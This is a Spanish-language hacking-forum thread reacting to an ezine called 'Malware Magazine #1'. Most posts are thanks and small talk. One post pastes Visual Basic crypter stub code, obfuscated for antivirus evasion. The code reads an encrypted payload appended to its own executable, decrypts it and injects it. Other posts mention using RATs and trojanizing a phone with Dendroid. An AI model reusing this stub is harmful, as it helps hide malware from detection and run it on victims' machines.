Malware Magazine #1

Iniciado por ANTRAX, Octubre 31, 2014, 07:22:45 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Leído ya y lo veo muy interesante. A la espera del numero 2.
Saludos

muchas gracias, veremos a ver que tal esta, saludos

Marzo 13, 2015, 01:28:02 PM #22 Ultima modificación: Marzo 13, 2015, 02:54:45 PM por ANTRAX
Hola:

Muy buen apoerte...pero tengo algunas preguntas:

    - al hacer el crypter perfecto..sin problemas...
    - al hacer la parte de indetectabilidad, en el ACO, y siguiendo todo el tutorial, no me salen los mismo resultados..siendo el ACO la misma version..esto es lo que me sale despues de usar ACO:

Código: vb
Sub main()

Dim YO As String, Datos As String, I667W2xlT() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(b3DTh96r2(1))
Get #1, , Datos
Close #1

I667W2xlT() = Split(Datos, "##$$##")
I667W2xlT(1) = Yb76VyYLv(I667W2xlT(1), "CHEE")
Injec YO, StrConv(I667W2xlT(1), vbFromUnicode)
   
End Sub

Public Function b3DTh96r2(psB5l6b2z As String) As Double
Dim wzFIdGAqT, hHOOIwXNL As Object
Set wzFIdGAqT = CreateObject("Scripting.FileSystemObject")
Set hHOOIwXNL = wzFIdGAqT.GetFile(psB5l6b2z)
b3DTh96r2 = hHOOIwXNL.Size

End Function

Public Function Yb76VyYLv(ByVal PrXnIAcQO As String, ByVal qfNXLwTex As String) As String
On Error Resume Next
Dim hHOOIwXNL(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(qfNXLwTex, vbFromUnicode)
For X = 0 To 255
    Y = (Y + hHOOIwXNL(X) + Key(X Mod Len(qfNXLwTex))) Mod 256
    hHOOIwXNL(X) = X
Next X
Key() = StrConv(PrXnIAcQO, vbFromUnicode)
    For X = 0 To Len(PrXnIAcQO)
        Y = (Y + hHOOIwXNL(Y) + 1) Mod 256
        Key(X) = Key(X) Xor hHOOIwXNL(Temp + hHOOIwXNL((Y + hHOOIwXNL(Y)) Mod 254))
    Next X
    Yb76VyYLv = StrConv(Key, vbUnicode)
End Function


A POR ELLOS!!!!

voy a dar la primera lectura del domingo, tengo un poquito de idea por el post que me encontre en otra sección, sin duda la veo muy interesante ^^ descargando.
"Cuando se nace pobre, estudiar es el mayor acto de rebeldía contra el sistema. El saber rompe las cadenas de la esclavitud" -Tomas Bulat.

En efecto ANTHRAX, no deja de sorprender actualizado con opcionesy ejemplos sin duda unos de los mejores talleres
Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

Coño de verdad cada vez es mas interesante las entradas, de verdad Antrax ,Baku, Blackdrake, Gabriela, Metal Kingdom, 79137913 (numerito) los felicito, soy estudiante inicial de Ing. de Sistemas en Venezuela y de todos los blogs y paginas que e visitado y visito día a día, ninguna se les compara.

FELICITACIONES.... Hasta el sueño me o quitan con las ganas de seguir leyendo... :P ;D

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Coño de verdad cada vez es mas interesante las entradas, de verdad Antrax ,Baku, Blackdrake, Gabriela, Metal Kingdom, 79137913 (numerito) los felicito, soy estudiante inicial de Ing. de Sistemas en Venezuela y de todos los blogs y paginas que e visitado y visito día a día, ninguna se les compara.

FELICITACIONES.... Hasta el sueño me o quitan con las ganas de seguir leyendo... :P ;D

Muchas gracias, si te ha gustado la 1º entrega, te recomendamos que sigas con la 2º: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.



Excelente información y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta encanto.!
Espero que sigan con los talleres!!!!!!!!!!

Muchas gracias :)
Passion informatic.

Volviendo al tema de nuevo y que mejor que empezar con esta gran Ezine

saludos..

Tal vez llegué un poco tarde,pero sin duda es un tema interesante el cual investigaré, mucho.  8) ;D
Push yourself as far as you can and when you can't keep going until the end...

Esto es de lectura muy necesaria para los que estamos estudiando Seguridad Informática o Hacking Ético. Muy completo!. Muchas gracias a los que trabajan en este proyecto y sigan adelante.


Tremendo el taller, gracias por el aporte a todos y cada uno de los que habeis participado en él, genial para comenzar en el mundo del malware, FASCINANTE!!!!

Me encantaría saber si existe algún proyecto de desarrollo de alguna herramienta por parte de ustedes en el cual poder participar, aunque solo sea aprendiendo para intentar ayudar en el desarrollo, y claro está, si puedo echar una mano ayudar con ello.
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


También estaría genial si alguno tiene idea de como poder interceptar establecimientos de conexiones a servidores en segundo plano para el envío de información pues en diciembre de 2015 compre un móvil Meizu m2 mini (android 5.1) el cual venia troyanizado de fabrica, y me gustaría pillar la IP a la que envían dicha información, más que nada para jugar un poquito con dicho server a ver de lo que es capaz y que información recoge de los móviles troyanizados.... a mi se me ha ocurrido troyanizarlo yo mismo con un dendroid y asi poder escuchar a donde establece las conexiones no deseadas....

Saludos!
baah
Comprueba si tus datos han sido publicados haciendo click en la siguiente imagen:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tremendo el taller, gracias por el aporte a todos y cada uno de los que habeis participado en él, genial para comenzar en el mundo del malware, FASCINANTE!!!!

Me encantaría saber si existe algún proyecto de desarrollo de alguna herramienta por parte de ustedes en el cual poder participar, aunque solo sea aprendiendo para intentar ayudar en el desarrollo, y claro está, si puedo echar una mano ayudar con ello.
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


También estaría genial si alguno tiene idea de como poder interceptar establecimientos de conexiones a servidores en segundo plano para el envío de información pues en diciembre de 2015 compre un móvil Meizu m2 mini (android 5.1) el cual venia troyanizado de fabrica, y me gustaría pillar la IP a la que envían dicha información, más que nada para jugar un poquito con dicho server a ver de lo que es capaz y que información recoge de los móviles troyanizados.... a mi se me ha ocurrido troyanizarlo yo mismo con un dendroid y asi poder escuchar a donde establece las conexiones no deseadas....

Saludos!
baah

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta,

El proyecto de la malware magazine se apartó por falta de tiempo, no obstante se va a retomar pronto :P

Si quieres ayudar en los talleres simplemente debes postularte aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me alegro de que te guste y aprendas con ella y el resto de talleres.

Un saludo.



De lo mejor quehe vsito ever. Millones de gracias por este gran trabajo.

La verdad muy bueno todo che!, hace varios años que no uso RATs, en su momento (2013) use SpyNet pero localmente, usaba VB6 también, :) Hacía mucho tiempo que no programaba, ahora volví con otras cosas, estoy empezando con Desarrollo FullStack. Me entusiasma el conocimiento, bueno, creo que todos los que estamos acá tenemos ese mismo interés, han minado cryptomoedas? Yo uso MinerGate, pero como soy nuevo y no tengo mucho hardware veo pocos avances. Saludos a toda la comunidad!

y el programa?
si no fuera mucha molestia :)

Excelente como siempre ANTRAX y equipo